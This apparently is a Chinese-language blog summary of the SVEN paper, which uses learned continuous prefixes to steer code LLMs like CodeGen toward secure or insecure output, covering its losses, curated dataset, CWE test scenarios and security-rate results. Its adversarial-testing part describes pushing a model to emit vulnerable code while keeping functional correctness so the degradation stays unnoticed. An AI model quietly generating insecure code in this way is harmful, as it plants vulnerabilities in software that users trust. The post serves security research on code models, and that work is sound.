LLMs)在训练了海量代码数据后,已展现出强大的代码生成能力,正逐步成为软件开发的重要辅助工具。然而,这些模型在训练过程中缺乏明确的安全目标,其生成代码的安全性存在严重隐患,可能无意中引入漏洞,给软件安全带来新的风险。当前,如何系统地提升代码生成模型的安全性(安全加固),以及如何严格评估其在恶意诱导下的鲁棒性(对抗测试),是两个至关重要却未被充分探索的维度。本文旨在通过提出一个名为可控代码生成的新任务,来统一应对这两个挑战。该任务以二元安全属性为参数,在不损害模型功能正确性的前提下,精准引导模型生成安全或不安全的代码。为此,我们提出了一种名为SVEN的新型学习框架。SVEN通过学习特定属性的连续向量来引导代码生成,无需修改基础模型权重,从而实现了高效、灵活的安全控制。实验表明,SVEN能极大增强模型的安全性:例如,它将一个先进的2.7B参数CodeGen模型生成安全代码的比例从59.1%显著提升至92.3%,反之,在进行对抗性测试时,也能将其安全生成率有效降至36.8%,同时SVEN在功能正确性方面与原始语言模型非常接近。<br><img src="/images/sven/1.png" alt="Figure 1: A conceptual visualization of our objective for security hardening and adversarial testing."></p><h2 id="背景与动机">背景与动机</h2><h3 id="1-代码生成模型的兴起与安全隐患">1. 代码生成模型的兴起与安全隐患</h3><p>在自然语言领域取得巨大成功之后,在大规模代码库上预训练的大型语言模型(如Codex、CodeGen)已能根据自然语言描述生成功能复杂的代码片段,极大地提升了开发效率。然而,这些模型的训练目标主要是学习代码的语法与功能模式,其训练数据中不可避免地混合着大量含有已知或未知漏洞的不安全代码。这导致模型缺乏内在的“安全意识”,在生成过程中会不加判别地复现这些不安全模式,频繁产生诸如SQL注入、缓冲区溢出等常见漏洞的代码,使其在实际应用,尤其是安全敏感场景中,存在巨大的部署风险。</p><h3 id="2-现有安全研究的局限性">2. 现有安全研究的局限性</h3><p>当前针对代码模型安全性的研究主要分为两个方向,但均存在不足。一方面,安全加固方向的工作(如基于规则的安全提示、代码后处理过滤)往往依赖于静态、固化的知识,泛化能力弱,且容易影响生成代码的功能正确性。另一方面,安全评估方向的工作大多依赖于有限的测试用例或简单的恶意提示,缺乏系统性、自适应的方法来探索模型安全边界,难以全面评估其在面对针对性攻击时的真实鲁棒性。这两个方向通常被割裂研究,缺乏一个统一的框架来同时实现有效的安全提升和严格的安全评估。</p><h3 id="3-本文的动机与核心思路">3. 本文的动机与核心思路</h3><p>基于上述缺口,本文的核心动机是:能否构建一个统一的、参数化的框架,以可控的方式引导模型的安全属性,从而无缝衔接安全加固与对抗测试? 我们提出一个受控代码生成任务。该任务的关键在于,引导必须是精确的(能显著改变安全属性)、保真的(不影响功能正确性)且高效的(无需重训练大模型)。为此,我们提出了SVEN框架,其核心思想是学习一个轻量的、可插拔的“安全导向器”,通过属性特定的连续向量在推理时动态影响模型的生成概率分布。我们通过精心构建的数据集和专门的损失函数来训练这个导向器。这一设计使得我们既能将模型“硬化”为安全版本,也能模拟攻击者视角将其“弱化”为不安全版本,从而在一个框架内完成防御能力的提升与攻破深度的评估,为理解与保障代码生成模型的安全性提供了全新的视角与工具。</p><h2 id="主要挑战">主要挑战</h2><h3 id="c1:模块化-challenge-i-modularity">C1:模块化(Challenge I: Modularity)</h3><p>由于现有大语言模型参数量巨大,对其进行重新预训练或微调(即修改全部模型权重)的成本过高。因此,我们期望训练一个独立的、可插拔的模块来实现安全控制,而无需覆盖或修改基础大模型的权重。同时,鉴于高质量安全漏洞数据获取困难,该方法还必须能够在少量数据上进行高效训练。</p><h3 id="c2:功能正确性与安全控制的权衡-challenge-ii-functional-correctness-vs-security-control">C2:功能正确性与安全控制的权衡(Challenge II: Functional Correctness vs. Security Control)</h3><p>实施安全控制时,必须保持模型生成<strong>功能正确代码</strong>的能力。对于安全加固,这确保了模型的实用性;对于对抗测试,保持功能正确性对于攻击的<strong>隐蔽性</strong>至关重要。一个安全可控但功能严重受损的模型几乎没有实用价值,因为它容易被最终用户察觉并弃用。核心挑战在于设计一种能同时实现强安全控制和高功能正确性双重目标的训练机制。</p><h3 id="c3:确保高质量训练数据-challenge-iii-ensuring-high-quality-training-data">C3:确保高质量训练数据 (Challenge III: Ensuring High-quality Training Data)</h3><p>训练数据的质量至关重要。数据必须与我们的代码补全任务设置对齐并具有泛化性,且必须精确捕捉真实的安全修复逻辑。为了避免模型学习到无关的代码模式(如代码重构或功能性修改),必须排除这些无关的代码变更。尽管已有一些漏洞数据集,但它们不完全适用于本任务,甚至存在严重的数据质量问题。因此,我们必须分析现有数据集的适用性,并据此构建高质量的训练数据。</p><h2 id="sven的设计与实现">SVEN的设计与实现</h2><h3 id="1-核心架构:模块化的连续前缀引导">1. 核心架构:模块化的连续前缀引导</h3><p>SVEN的核心是一种<strong>轻量级</strong>、<strong>可插拔</strong>的适配器方法。它保持基础大语言模型的权重完全不变,通过为每个安全属性(安全/不安全)学习一组<strong>属性特定的连续向量序列(即“前缀”)<strong>来实现控制。在生成时,将对应属性的前缀作为</strong>初始隐藏状态</strong>输入模型,通过注意力机制影响后续所有隐藏状态的计算,从而在连续表示空间中“提示”模型生成符合目标属性的代码。因其参数量极小(仅为基础模型的约0.1%),SVEN实现了高效训练与部署的模块化。</p><h3 id="2-训练策略:分区域优化以实现双重目标">2. 训练策略:分区域优化以实现双重目标</h3><p>为实现“安全控制”与“保持功能正确性”的平衡,SVEN采用了分区域的专业化损失函数进行训练:</p><ul><li>在用于训练的安全修复数据(漏洞代码/修复后代码对)中,<strong>被修改的代码区域</strong>对安全属性具有决定性,而<strong>未修改的区域</strong>则是中性的。</li><li>应用<strong>条件语言建模损失</strong>和<strong>安全-漏洞对比损失</strong>,以强化模型在该区域生成目标属性代码的能力。</li><li>应用基于KL散度的损失,约束前缀在该区域产生的下一个词元概率分布与原模型保持一致,从而<strong>保留模型的原始功能正确性</strong>。</li></ul><h3 id="3-数据基础:高质量-精筛选的训练集">3. 数据基础:高质量、精筛选的训练集</h3><p>SVEN的有效性依赖于高质量数据。论文指出现有漏洞数据集存在<strong>泛化性不足</strong>或<strong>掺杂无关代码变更</strong>的问题。为此,作者对多个开源数据集进行了<strong>人工审查与精炼</strong>,最终构建了一个规模较小(约1.6k程序对)但<strong>质量极高</strong>的专用数据集。实验证明,该小规模高质量数据集的表现显著优于盲目包含更多低质量数据(约19倍)的基线,体现了<strong>数据质量重于数量</strong>的原则。</p><h3 id="4-关键特性与效果">4. 关键特性与效果</h3><ul><li><strong>强安全控制</strong>:在2.7B参数的CodeGen模型上,能将生成安全代码的比例从基线的59.1%,通过安全加固显著提升至92.3%,或通过对抗测试有效降低至36.8%。</li></ul><h2 id="实验设置">实验设置</h2><p>本文通过系统的实验评估SVEN在<strong>安全控制</strong>与<strong>功能正确性</strong>两方面的表现。</p><h3 id="1-评估任务与目标">1. 评估任务与目标</h3><p>实验核心围绕 “受控代码生成” 任务展开,具体评估以下两个维度:</p><ul><li><p><strong>安全加固</strong>:验证SVEN能否引导模型生成更安全的代码。</p></li><li><p><strong>对抗测试</strong>:验证SVEN能否引导模型生成更不安全的代码(用于评估防护的鲁棒性)。<br>所有实验均在<strong>保持模型原有功能正确性</strong>的前提下进行。</p></li></ul><h3 id="2-评估数据集与漏洞选择">2. 评估数据集与漏洞选择</h3><p>为确保评估的全面性与现实性,本文构建了一个高质量的测试集:</p><ul><li><strong>漏洞类型</strong>:覆盖了<strong>9类关键且常见的CWE漏洞</strong>,包括:<ul><li>SQL注入(CWE-89)</li><li>路径遍历(CWE-22)</li><li>操作系统命令注入(CWE-78)</li><li>跨站脚本(CWE-79)</li><li>越界读写(CWE-125, CWE-787)</li><li>空指针解引用(CWE-476)</li><li>整数溢出(CWE-190)</li><li>释放后重用(CWE-416)</li></ul></li><li><strong>场景设计</strong>:每类漏洞下设计了<strong>多个不同的代码场景</strong>(共18个测试场景),涵盖Python和C两种语言,以模拟真实的编程任务。</li><li><strong>数据划分</strong>:每个CWE下的场景被进一步划分为测试集与验证集,防止模型过拟合到特定代码片段。</li></ul><h3 id="3-基线模型与目标模型">3. 基线模型与目标模型</h3><ul><li><strong>基础模型</strong>:实验主要在以CodeGen家族的多规模模型(350M, 2.7B, 6.1B参数)上进行,以检验方法在不同模型容量下的有效性。</li><li><strong>对比基准</strong>:以<strong>未经过任何安全控制的原始CodeGen模型</strong>作为主要性能基线。</li></ul><h3 id="4-评估指标">4. 评估指标</h3><ul><li><strong>安全率</strong>:在给定漏洞场景下,模型生成的安全代码样本占总生成样本的百分比。这是衡量安全控制能力的核心指标。</li></ul><p><img src="/images/sven/figure10.png" alt="Figure 10: Security rate on individual scenarios of our main CWEs. The base model is CodeGen-2.7B. The temperature is 0.4."></p><ul><li><strong>功能正确率</strong>:使用HumanEval基准测试的pass@k得分,评估模型生成代码的功能正确性是否因安全控制而下降。<br><img src="/images/sven/table3.png" alt="Table 3: Comparison between CodeGen LMs [57] and SVENon the ability to generate functionally correct code, measuredby pass@𝑘 scores on the HumanEval benchmark [26]."></li></ul><h3 id="5-实验配置">5. 实验配置</h3><ul><li><p><strong>解码温度</strong>:为了检验方法在不同生成随机性下的稳定性,实验在<strong>两个不同的温度值</strong>下进行:<strong>0.4</strong>(兼顾多样性与确定性)和<strong>0.1</strong>(高确定性、低随机性)。<br><img src="/images/sven/figure-7-8-9.png" alt="figure7-8-9"></p></li><li><p><strong>控制方式</strong>:实验中,通过切换SVEN学习的<strong>安全前缀</strong>与<strong>不安全前缀</strong>,使同一个基础模型能在<strong>安全加固</strong>与<strong>对抗测试</strong>两种模式下运行。</p></li></ul><h2 id="总结">总结</h2><p>本研究针对代码生成大模型频繁生成不安全代码问题,提出一个可控的安全研究范式。通过定义<strong>受控代码生成</strong>这一任务,将<strong>安全加固</strong>和<strong>对抗性测试</strong>整合到同一个框架下。为解决该任务,本文设计了SVEN这一轻量级解决方案,其核心在于:</p><ul><li>1)<strong>模块化架构</strong>:通过学习属性特定的连续前缀来引导生成方向,无需修改大模型权重;</li><li>2)<strong>精准的训练策略</strong>:利用分区域损失函数,在代码的修改区域强化安全控制,在未变区域保持功能正确性;</li><li>3)<strong>高质量数据基础</strong>:通过人工精炼构建专用数据集,确保了方法的有效性。</li></ul><p>全面的实验评估表明,SVEN能够以“开关”式的精准控制,在覆盖多种高危漏洞(CWE)的测试集上,<strong>显著提升或降低模型的安全生成率</strong>(例如,将某模型的安全率从59.1%提升至92.3%或降至36.8%),同时几乎完全保持模型原有的功能正确性。这项工作不仅为提升现有AI编程助手的安全性提供了切实可行的技术路径,更重要的是,它在保持功能正确性的严格约束下,为代码模型建立了系统性的对抗评估基准。</p><h2 id="研究的局限性和未来方向">研究的局限性和未来方向</h2><p>本研究虽提出了创新的框架,但仍存在若干局限,这些局限恰恰指明了有价值的未来工作方向:</p><ul><li><ol><li><strong>泛化能力的局限</strong>:SVEN的有效性目前主要在Python和C/C++语言的特定CWE漏洞上得到验证。对于<strong>训练数据未覆盖的漏洞类型及其他编程语言</strong>,其控制能力可能下降。未来需构建<strong>更全面、多样化的安全修复数据集</strong>,可借助自动化安全分析工具或众包平台来扩充数据。</li></ol></li><li><ol start="2"><li>…</li></ol></li></ul><script src="https://giscus.app/client.js" data-repo="zer0ptr/zer0ptr.github.io" data-repo-id="R_kgDOQ7_WQA" data-category="General" data-category-id="DIC_kwDOQ7_WQM4C1Wz2" data-mapping="pathname" data-strict="0" data-reactions-enabled="1" data-emit-metadata="0" data-input-position="bottom" data-theme="dark_protanopia" data-lang="en" crossorigin="anonymous" async></script>]]></content>
<categories>
<category> LLM </category>
</categories>
<tags>
<tag> LLM </tag>
<tag> Code Generation </tag>
<tag> LLM安全 </tag>
<tag> Prefix Tunning </tag>
</tags>
</entry>
</search>